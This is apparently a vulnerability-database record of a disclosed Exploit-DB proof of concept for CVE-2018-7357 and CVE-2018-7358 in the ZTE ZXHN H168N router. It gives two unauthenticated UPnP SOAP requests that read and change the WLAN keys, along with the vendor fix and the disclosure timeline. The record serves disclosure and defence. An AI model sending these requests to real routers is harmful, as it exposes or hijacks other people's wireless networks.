ID
VAR-E-201812-0237
CVE
cve_id: | CVE-2018-7357 | Trust: 1.5 |
cve_id: | CVE-2018-7358 | Trust: 1.5 |
EDB ID
45972
TITLE
ZTE ZXHN H168N - Improper Access Restrictions - Hardware webapps Exploit
Trust: 0.6
DESCRIPTION
ZTE ZXHN H168N - Improper Access Restrictions. CVE-2018-7358, CVE-2018-7357. webapps exploit for Hardware platform
Trust: 0.6
AFFECTED PRODUCTS
vendor: | zte | model: | zxhn h168n | scope: | - | version: | - | Trust: 1.6 |
vendor: | zte | model: | home gateway zxhn h168n access control | scope: | eq | version: | 2.2 | Trust: 0.5 |
EXPLOIT
[*] POC: (CVE-2018-7357 and CVE-2018-7358)
Disclaimer: [This POC is for Educational Purposes, I would Not be
responsible for any misuse of the information mentioned in this blog post]
[+] Unauthenticated
[+] Author: Usman Saeed (usman [at] xc0re.net)
[+] Protocol: UPnP
[+] Affected Hardware/Software:
Model name: ZXHN H168N v2.2
Build Timestamp: 20171127193202
Software Version: V2.2.0_PK1.2T5
[+] Findings:
1. Unauthenticated access to WLAN password:
POST /control/igd/wlanc_1_1 HTTP/1.1
Host: <IP>:52869
User-Agent: {omitted}
Content-Length: 288
Connection: close
Content-Type: text/xml; charset="utf-8"
SOAPACTION: "urn:dslforum-org:service:WLANConfiguration:1#GetSecurityKeys"
<?xml version="1.0" encoding="utf-8"?>
<s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:GetSecurityKeys xmlns:u="urn:dslforum-org:service:WLANConfiguration:1"></u:GetSecurityKeys></s:Body></s:Envelope>
2. Unauthenticated WLAN passphrase change:
POST /control/igd/wlanc_1_1 HTTP/1.1
Host: <IP>:52869
User-Agent: {omitted}
Content-Length: 496
Connection: close
Content-Type: text/xml; charset="utf-8"
SOAPACTION: "urn:dslforum-org:service:WLANConfiguration:1#SetSecurityKeys"
<?xml version="1.0" encoding="utf-8"?>
<s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:SetSecurityKeys xmlns:u="urn:dslforum-org:service:WLANConfiguration:1"><NewWEPKey0>{omitted}</NewWEPKey0><NewWEPKey1>{omitted}</NewWEPKey1><NewWEPKey2>{omitted}</NewWEPKey2><NewWEPKey3>{omitted}</NewWEPKey3><NewPreSharedKey>{omitted}</NewPreSharedKey><NewKeyPassphrase>{omitted}</NewKeyPassphrase></u:SetSecurityKeys></s:Body></s:Envelope>
[*] Solution:
UPnP should not provide excessive services, and if the fix is not possible, then UPnP should be disabled on the affected devices.
[*] Note:
There are other services which should not be published over UPnP, which are not mentioned in this blog post, as the solution is the same.
[+] Responsible Disclosure:
Vulnerabilities identified – 20 August, 2018
Reported to ZTE – 28 August, 2018
ZTE official statement – 17 September 2018
ZTE patched the vulnerability – 12 November 2018
The operator pushed the update – 12 November 2018
CVE published – Later
Public disclosure – 12 November 2018
Ref: http://support.zte.com.cn/support/news/LoopholeInfoDetail.aspx?newsId=1009522
Trust: 1.0
EXPLOIT LANGUAGE
txt
Trust: 0.6
PRICE
free
Trust: 0.6
TYPE
Improper Access Restrictions
Trust: 1.6
TAGS
tag: | exploit | Trust: 0.5 |
tag: | vulnerability | Trust: 0.5 |
tag: | bypass | Trust: 0.5 |
tag: | info disclosure | Trust: 0.5 |
CREDITS
Usman Saeed
Trust: 0.6
EXTERNAL IDS
db: | ZTE | id: | 1009522 | Trust: 2.7 |
db: | EXPLOIT-DB | id: | 45972 | Trust: 1.6 |
db: | NVD | id: | CVE-2018-7357 | Trust: 1.5 |
db: | NVD | id: | CVE-2018-7358 | Trust: 1.5 |
db: | 0DAYTODAY | id: | 31756 | Trust: 0.6 |
db: | EDBNET | id: | 100495 | Trust: 0.6 |
db: | EDBNET | id: | 100531 | Trust: 0.6 |
db: | PACKETSTORM | id: | 150728 | Trust: 0.5 |
REFERENCES
url: | https://nvd.nist.gov/vuln/detail/cve-2018-7358 | Trust: 1.5 |
url: | https://nvd.nist.gov/vuln/detail/cve-2018-7357 | Trust: 1.5 |
url: | https://0day.today/exploits/31756 | Trust: 0.6 |
url: | https://www.exploit-db.com/exploits/45972/ | Trust: 0.6 |
SOURCES
db: | PACKETSTORM | id: | 150728 |
db: | EXPLOIT-DB | id: | 45972 |
db: | EDBNET | id: | 100495 |
db: | EDBNET | id: | 100531 |
LAST UPDATE DATE
2022-07-27T09:32:13.450000+00:00
SOURCES RELEASE DATE
db: | PACKETSTORM | id: | 150728 | date: | 2018-12-11T01:49:45 |
db: | EXPLOIT-DB | id: | 45972 | date: | 2018-12-11T00:00:00 |
db: | EDBNET | id: | 100495 | date: | 2018-12-12T00:00:00 |
db: | EDBNET | id: | 100531 | date: | 2018-12-16T00:00:00 |